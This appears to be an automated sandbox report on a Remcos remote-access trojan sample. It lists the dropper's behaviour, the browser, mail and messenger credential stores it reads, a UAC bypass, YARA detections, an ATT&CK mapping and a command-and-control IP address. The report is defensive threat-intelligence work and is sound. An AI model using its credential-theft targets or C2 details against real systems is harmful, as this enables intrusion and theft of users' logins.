                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00761201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00761201
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00742BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00742BA5
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0076B226 SendInput,keybd_event,0_2_0076B226
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_007822DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_007822DA
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Process created: C:\Users\user\AppData\Local\Cocles\antholite.exe C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\hrwdimdtylblmzmsnycdtxncbowjm"
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Process created: C:\Users\user\AppData\Local\Cocles\antholite.exe C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\sljoieovmttyofawejoeebhlbcosfxea"
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Process created: C:\Users\user\AppData\Local\Cocles\antholite.exe C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\cnoh"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Cocles\antholite.exe "C:\Users\user\AppData\Local\Cocles\antholite.exe"
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00760B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00760B62
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00761663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00761663
                  Source: Rgh99876k7e.exe, antholite.exe.0.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp, antholite.exe, 00000002.00000002.4550896942.00000000012A7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
                  Source: antholite.exe | Binary or memory string: Shell_TrayWnd
                  Source: antholite.exe, 00000002.00000002.4550896942.00000000012A7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager[z
                  Source: antholite.exe, 00000002.00000002.4550896942.00000000012A7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager-z
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerSM\caW
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerons|
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerSM\j
                  Source: antholite.exe, 00000002.00000002.4550896942.00000000012A7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager*z
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp, antholite.exe, 00000002.00000002.4550520256.0000000001198000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerSM\f
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerSM\ca
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp, antholite.exe, 00000002.00000002.4550520256.00000000011B2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerSM\
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp, logs.dat.2.dr | Binary or memory string: [Program Manager]
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00720698 cpuid 0_2_00720698
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: EnumSystemLocalesW,2_2_0045201B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: EnumSystemLocalesW,2_2_004520B6
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00452143
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: GetLocaleInfoW,2_2_00452393
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: EnumSystemLocalesW,2_2_00448484
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_004524BC
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: GetLocaleInfoW,2_2_004525C3
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00452690
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: GetLocaleInfoW,2_2_0044896D
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: GetLocaleInfoA,2_2_0040F90C
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,2_2_00451D58
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: EnumSystemLocalesW,2_2_00451FD0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00778195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00778195
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0075D27A GetUserNameW,0_2_0075D27A
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0073B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0073B952
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_007042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007042DE
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000002.00000003.2135709723.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.4551244504.0000000003DFF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000003.2168391666.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.4550751358.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.4550520256.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.2233512989.0000000001904000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000003.2169326996.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000003.2131579771.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000003.2141891064.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: antholite.exe PID: 6364, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: antholite.exe PID: 6444, type: MEMORYSTR
                  Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 2_2_0040BA4D
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 2_2_0040BB6B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: \key3.db 2_2_0040BB6B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Source: Yara match | File source: Process Memory Space: antholite.exe PID: 6364, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: antholite.exe PID: 4180, type: MEMORYSTR
                  Source: antholite.exe | Binary or memory string: WIN_81
                  Source: antholite.exe | Binary or memory string: WIN_XP
                  Source: antholite.exe.0.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: antholite.exeBinary or memory string: WIN_XPe
                  Source: antholite.exeBinary or memory string: WIN_VISTA
                  Source: antholite.exeBinary or memory string: WIN_7
                  Source: antholite.exeBinary or memory string: WIN_8

                  Remote Access Functionality

Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-NKQ1SM
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-NKQ1SM
Source: Yara match | File source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000003.2135709723.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4551244504.0000000003DFF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2168391666.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4550751358.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4550520256.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2233512989.0000000001904000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2169326996.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2131579771.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2141891064.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: antholite.exe PID: 6364, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: antholite.exe PID: 6444, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: cmd.exe, 2_2_0040569A
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00781204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00781204
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00781806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00781806
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00911204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_00911204
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00911806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00911806
MITRE ATT&CK matrix (a number in front of a technique is the count of matching signatures in this report):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 111 Scripting | 2 Valid Accounts | 1 Native API | 111 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 121 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 2 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement
Email Addresses | DNS Server | Domain Accounts | 2 Service Execution | 2 Valid Accounts | 1 Bypass User Account Control | 2 Obfuscated Files or Information | 1 Credentials in Registry | 1 System Service Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Windows Service | 2 Valid Accounts | 1 DLL Side-Loading | 3 Credentials In Files | 3 File and Directory Discovery | Distributed Component Object Model | 121 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 Bypass User Account Control | LSA Secrets | 38 System Information Discovery | SSH | 3 Clipboard Data | 12 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Windows Service | 1 Masquerading | Cached Domain Credentials | 231 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 222 Process Injection | 2 Valid Accounts | DCSync | 11 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | 2 Registry Run Keys / Startup Folder | 11 Virtualization/Sandbox Evasion | Proc Filesystem | 4 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 11 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 222 Process Injection | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior Graph ID: 1503444 | Sample: Rgh99876k7e.exe | Startdate: 03/09/2024 | Architecture: WINDOWS | Score: 100

Behavior graph (node numbers from the graph in parentheses):

Start (2)
  DNS/IP: geoplugin.net (34)
  Signatures: Suricata IDS alerts for network traffic (50); Found malware configuration (52); Malicious sample detected (through community Yara rule) (54); 11 other signatures (56)
  Started: Rgh99876k7e.exe 6 (8); wscript.exe 1 (12)
Rgh99876k7e.exe (8)
  Dropped: C:\Users\user\AppData\Local\...\antholite.exe, PE32 (28)
  Signatures: Binary is likely a compiled AutoIt script file (66); Found API chain indicative of sandbox detection (68)
  Started: antholite.exe 3 19 (14)
wscript.exe (12)
  Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage) (70)
  Started: antholite.exe 2 (19)
antholite.exe (14)
  DNS/IP: 192.210.150.26, 49704, 49705, 8787 AS-COLOCROSSINGUS United States (36); geoplugin.net 178.237.33.50, 49706, 80 ATOM86-ASATOM86NL Netherlands (38)
  Dropped: C:\Users\user\AppData\...\antholite.vbs, data (30); C:\ProgramData\remcos\logs.dat, data (32)
  Signatures: Multi AV Scanner detection for dropped file (40); Contains functionality to bypass UAC (CMSTPLUA) (42); Detected Remcos RAT (44); 10 other signatures (48)
  Started: antholite.exe 1 (21); antholite.exe 1 (24); antholite.exe 2 (26)
antholite.exe (19)
  Signatures: Binary is likely a compiled AutoIt script file (46)
antholite.exe (21)
  Signatures: Binary is likely a compiled AutoIt script file (58); Tries to steal Instant Messenger accounts or passwords (60); Tries to harvest and steal browser information (history, passwords, etc) (62)
antholite.exe (24)
  Signatures: Tries to steal Mail credentials (via file / registry access) (64)

Source | Detection | Scanner | Label | Link
Rgh99876k7e.exe | 63% | ReversingLabs | Win32.Backdoor.Remcos |
Rgh99876k7e.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Cocles\antholite.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Cocles\antholite.exe | 63% | ReversingLabs | Win32.Backdoor.Remcos |

No Antivirus matches

No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.imvu.comr | 0% | URL Reputation | safe |
http://www.imvu.com | 0% | URL Reputation | safe |
https://aefd.nelreports.net/api/report?cat=bingaotak | 0% | URL Reputation | safe |
https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe |
http://geoplugin.net/json.gpSystem32 | 0% | URL Reputation | safe |
http://geoplugin.net/json.gp | 0% | URL Reputation | safe |
https://aefd.nelreports.net/api/report?cat=bingaot | 0% | URL Reputation | safe |
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe |
https://aefd.nelreports.net/api/report?cat=bingrms | 0% | URL Reputation | safe |
https://login.yahoo.com/config/login | 0% | URL Reputation | safe |
http://www.ebuddy.com | 0% | URL Reputation | safe |
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P | 0% | Avira URL Cloud | safe |
https://www.office.com/ | 0% | Avira URL Cloud | safe |
https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e | 0% | Avira URL Cloud | safe |
http://www.nirsoft.net | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gp) | 0% | Avira URL Cloud | safe |
192.210.150.26 | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gpu | 0% | Avira URL Cloud | safe |
https://www.google.com | 0% | Avira URL Cloud | safe |
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe |
https://login.li | 0% | Avira URL Cloud | safe |
https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073 | 0% | Avira URL Cloud | safe |
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gpK | 0% | Avira URL Cloud | safe |
https://maps.windows.com/windows-app-web-link | 0% | Avira URL Cloud | safe |
https://www.google.com/accounts/servicelogin | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gpM | 0% | Avira URL Cloud | safe |
http://www.imvu.comata | 0% | Avira URL Cloud | safe |
http://www.nirsoft.net/ | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
192.210.150.26 | true | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P | bhvA838.tmp.3.dr | false | Avira URL Cloud: safe | unknown
https://www.office.com/ | bhvA838.tmp.3.dr | false | Avira URL Cloud: safe | unknown
http://www.imvu.comr | antholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gp) | antholite.exe, 00000002.00000003.2142233343.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://login.li | antholite.exe, 00000003.00000002.2160855466.0000000000A9C000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e | bhvA838.tmp.3.dr | false | Avira URL Cloud: safe | unknown
http://www.imvu.com | antholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2147465927.000000000116D000.00000004.00000020.00020000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.nirsoft.net | antholite.exe, 00000003.00000002.2160954992.00000000011F4000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=bingaotak | bhvA838.tmp.3.dr | false | URL Reputation: safe | unknown
https://deff.nelreports.net/api/report?cat=msn | bhvA838.tmp.3.dr | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpu | antholite.exe, 00000002.00000002.4550896942.00000000012A7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
